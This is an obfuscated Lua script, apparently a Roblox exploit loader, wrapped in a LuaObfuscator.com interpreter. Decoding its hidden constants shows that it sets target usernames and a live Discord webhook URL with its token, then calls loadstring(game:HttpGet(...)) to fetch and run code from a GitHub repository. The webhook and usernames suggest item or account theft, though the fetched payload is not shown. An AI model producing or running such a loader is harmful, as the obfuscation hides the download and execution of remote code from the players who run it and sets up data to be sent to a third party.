--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v80=0;while true do if (v80==0) then v19=v0(v3(v30,1,1));return "";end end else local v81=v2(v0(v30,16));if v19 then local v86=v5(v81,v19);v19=nil;return v86;else return v81;end end end);local function v20(v31,v32,v33)if v33 then local v82=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-(1 + 0)) -(v32-(1 -0))) + (2 -(878 -(282 + 595))))) ;return v82-(v82%(620 -(555 + 64))) ;else local v83=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v83 + v83))>=v83) and (928 -((1851 -(1523 + 114)) + 713))) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 + 0 ;local v36;local v37;while true do if (v35==(1 -0)) then return (v37 * (1321 -(67 + 1 + 997))) + v36 ;end if (v35==0) then v36,v37=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;v35=118 -(32 + 85) ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 1 + 2 );v18=v18 + (961 -((1242 -(87 + 263)) + 65)) ;return (v41 * (40022563 -23245347)) + (v40 * (121138 -55602)) + (v39 * (469 -213)) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=181 -(67 + 113) ;local v45=(v20(v43,1,20) * ((2 + 0)^(78 -(176 -130)))) + v42 ;local v46=v20(v43,16 + 5 ,123 -92 );local v47=((v20(v43,984 -(802 + 150) )==(2 -1)) and  -(1 -0)) or (443 -(416 + 26)) ;if (v46==0) then if (v45==(0 + 0)) then return v47 * (997 -(915 + 82)) ;else local v87=0 -(0 -0) ;while true do if (v87==(0 + 0)) then v46=1 -0 ;v44=1187 -(1069 + (376 -258)) ;break;end end end elseif (v46==((4661 -(10 + 8)) -(1115 + 1481))) then return ((v45==(0 -0)) and (v47 * (((1 -0) + 0)/(0 -(438 -(145 + 293)))))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/((2 + 0)^(843 -(368 + 423))))) ;end local function v25(v48)local v49=430 -(44 + 386) ;local v50;local v51;while true do if (v49==(1487 -(998 + 488))) then v50=v3(v16,v18,(v18 + v48) -((3 -2) + 0) );v18=v18 + v48 ;v49=2 + 0 ;end if (v49==(862 -(814 + 45))) then return v6(v51);end if (v49==(772 -(201 + (1406 -835)))) then v50=nil;if  not v48 then v48=v23();if (v48==(1138 -(116 + 1022))) then return "";end end v49=4 -3 ;end if (v49==(2 + 0)) then v51={};for v88=1, #v50 do v51[v88]=v2(v1(v3(v50,v88,v88)));end v49=10 -7 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52~=(1945 -(1008 + 935))) then else v57=nil;v58=nil;v52=159 -(142 + 14) ;end if (v52==1) then v55=nil;v56=nil;v52=1795 -(1563 + 230) ;end if (v52~=(285 -(134 + 151))) then else v53=0;v54=nil;v52=1 + 0 ;end if (3~=v52) then else v59=nil;while true do local v90=0 + 0 ;while true do if (0==v90) then if (v53==(1666 -(970 + 695))) then local v97=0 -0 ;while true do if (v97==(1992 -(582 + 1408))) then v53=2;break;end if (v97==(3 -2)) then for v109=66 -(30 + 35) ,v58 do local v110=0 -0 ;local v111;local v112;local v113;local v114;while true do if (v110~=(7 -5)) then else while true do if (v111==(1825 -(1195 + 629))) then v114=nil;while true do if (v112==(1 -0)) then if (v113==1) then v114=v21()~=(241 -(187 + 54)) ;elseif (v113==2) then v114=v24();elseif (v113==(1215 -(323 + 889))) then v114=v25();end v59[v109]=v114;break;end if (v112~=(0 -0)) then else local v152=780 -(162 + 618) ;local v153;while true do if (v152~=(320 -(53 + 267))) then else v153=0 + 0 ;while true do if (v153==(1 + 0)) then v112=1 -0 ;break;end if ((982 -(18 + 964))==v153) then v113=v21();v114=nil;v153=1 -0 ;end end break;end end end end break;end if (v111==(0 + 0)) then local v144=1636 -(1373 + 263) ;while true do if (v144==(1000 -(451 + 549))) then v112=0 + 0 ;v113=nil;v144=1 + 0 ;end if (v144~=(1 -0)) then else v111=127 -(116 + 10) ;break;end end end end break;end if (v110==1) then v113=nil;v114=nil;v110=1 + 1 ;end if ((0 -0)~=v110) then else v111=0 -0 ;v112=nil;v110=1385 -(746 + 638) ;end end end v57[1 + 2 ]=v21();v97=1 + 1 ;end if (0~=v97) then else v58=v23();v59={};v97=1 + 0 ;end end end if ((1 + 1)==v53) then local v98=0 -0 ;local v99;while true do if (v98==(341 -(218 + 123))) then v99=1581 -(1535 + 46) ;while true do local v115=0 -0 ;while true do if (v115==(1551 -(1126 + 425))) then if ((0 + 0)==v99) then for v145=1,v23() do local v146=0;local v147;local v148;while true do if ((405 -(118 + 287))==v146) then v147=0 + 0 ;v148=nil;v146=1122 -(118 + 1003) ;end if (v146~=(561 -(306 + 254))) then else while true do if (v147==(0 + 0)) then v148=v21();if (v20(v148,1 -0 ,1)==(0 -0)) then local v154=1467 -(899 + 568) ;local v155;local v156;local v157;local v158;while true do if (v154==2) then while true do if (v155~=(0 + 0)) then else v156=v20(v148,1 + 1 ,980 -(553 + 424) );v157=v20(v148,9 -5 ,609 -(268 + 335) );v155=1;end if (v155==(292 -(60 + 230))) then local v160=0;local v161;while true do if (0==v160) then v161=0;while true do if (v161==(573 -(426 + 146))) then v155=3;break;end if ((0 + 0)~=v161) then else local v169=0 + 0 ;while true do if (v169==(1457 -(282 + 1174))) then v161=812 -(569 + 242) ;break;end if (v169~=0) then else if (v20(v157,1 + 0 ,1)==(2 -1)) then v158[2]=v59[v158[2]];end if (v20(v157,1 + 1 ,2)==(1025 -(706 + 318))) then v158[1254 -(721 + 530) ]=v59[v158[1274 -(945 + 326) ]];end v169=1;end end end end break;end end end if (v155~=(2 + 1)) then else if (v20(v157,6 -3 ,7 -4 )~=(1 + 0)) then else v158[4]=v59[v158[704 -(271 + 429) ]];end v54[v145]=v158;break;end if (v155~=(1 + 0)) then else local v163=0;while true do if ((2 -1)==v163) then v155=1502 -(1408 + 92) ;break;end if ((1086 -(461 + 625))==v163) then v158={v22(),v22(),nil,nil};if (v156==0) then local v166=1171 -(418 + 753) ;local v167;local v168;while true do if (v166==(1 + 0)) then while true do if (v167~=0) then else v168=1329 -(797 + 532) ;while true do if (v168==(0 + 0)) then v158[1 + 2 ]=v22();v158[2 + 2 ]=v22();break;end end break;end end break;end if (v166~=(0 + 0)) then else v167=529 -(406 + 123) ;v168=nil;v166=2 -1 ;end end elseif (v156==1) then v158[1205 -(373 + 829) ]=v23();elseif (v156==(733 -(476 + 255))) then v158[1772 -(1749 + 20) ]=v23() -((2 + 0)^(4 + 12)) ;elseif (v156==3) then local v176=1322 -(1249 + 73) ;while true do if (v176~=(238 -(64 + 174))) then else v158[2 + 1 ]=v23() -((1147 -(466 + 679))^16) ;v158[340 -(144 + 192) ]=v22();break;end end end v163=2 -1 ;end end end end break;end if (v154==(2 -1)) then v157=nil;v158=nil;v154=1902 -(106 + 1794) ;end if (v154~=(0 + 0)) then else local v159=0 + 0 ;while true do if (v159==(0 -0)) then v155=0 -0 ;v156=nil;v159=2 -1 ;end if (v159~=(115 -(4 + 110))) then else v154=585 -(57 + 527) ;break;end end end end end break;end end break;end end end for v149=1428 -(41 + 1386) ,v23() do v55[v149-(1 + 0) ]=v28();end v99=1;end if (v99==1) then return v57;end break;end end end break;end end end v90=104 -(17 + 86) ;end if (v90==1) then if (v53==0) then local v100=0 + 0 ;while true do if (v100~=(1 + 0)) then else v56={};v57={v54,v55,nil,v56};v100=2;end if (v100~=(166 -(122 + 44))) then else v54={};v55={};v100=1 -0 ;end if (v100==2) then v53=1662 -(1477 + 184) ;break;end end end break;end end end break;end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v84=0,v74 do if (v84>=v68) then v72[v84-v68 ]=v73[v84 + 1 ];else v76[v84]=v73[v84 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do local v85=0;while true do if (v85==0) then v78=v66[v70];v79=v78[1];v85=1;end if (v85==1) then if (v79<=4) then if (v79<=1) then if (v79==0) then v76[v78[2]]=v62[v78[3]];else do return;end end elseif (v79<=2) then v76[v78[2]]();elseif (v79==3) then local v116=v78[2];local v117,v118=v69(v76[v116](v13(v76,v116 + 1 ,v78[3])));v71=(v118 + v116) -1 ;local v119=0;for v136=v116,v71 do v119=v119 + 1 ;v76[v136]=v117[v119];end else local v120;local v121;v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v62[v78[3]]=v76[v78[2]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v62[v78[3]]=v76[v78[2]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v62[v78[3]]=v76[v78[2]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v62[v78[3]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v62[v78[3]];v70=v70 + 1 ;v78=v66[v70];v121=v78[2];v120=v76[v78[3]];v76[v121 + 1 ]=v120;v76[v121]=v120[v78[4]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3];end elseif (v79<=6) then if (v79>5) then v76[v78[2]]=v78[3]~=0 ;else local v104=v78[2];v76[v104]=v76[v104](v13(v76,v104 + 1 ,v71));end elseif (v79<=7) then v62[v78[3]]=v76[v78[2]];elseif (v79>8) then v76[v78[2]]=v78[3];else local v133=0;local v134;local v135;while true do if (1==v133) then v76[v134 + 1 ]=v135;v76[v134]=v135[v78[4]];break;end if (v133==0) then v134=v78[2];v135=v76[v78[3]];v133=1;end end end v70=v70 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0A3O0003083O00557365724E616D65030F3O006D656A696D656A696D656A6933323103073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313531353730323336382O343238323034372F4A4674433378564468337A41553630686C4D65527747676E456B744D61565F334C6250633435617A6258673632794B6B4B6D4A35737051314566755F5762715F6E5A725703093O00557365724E616D653203093O006D656A696D656A6939030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F726953637269707473000F3O0012043O00023O00124O00013O00124O00043O00124O00033O00124O00063O00124O00053O00124O00073O00122O000100083O00202O00010001000900122O0003000A4O0006000400014O0003000100044O00055O00022O00023O000100012O00013O00017O00",v9(),...);
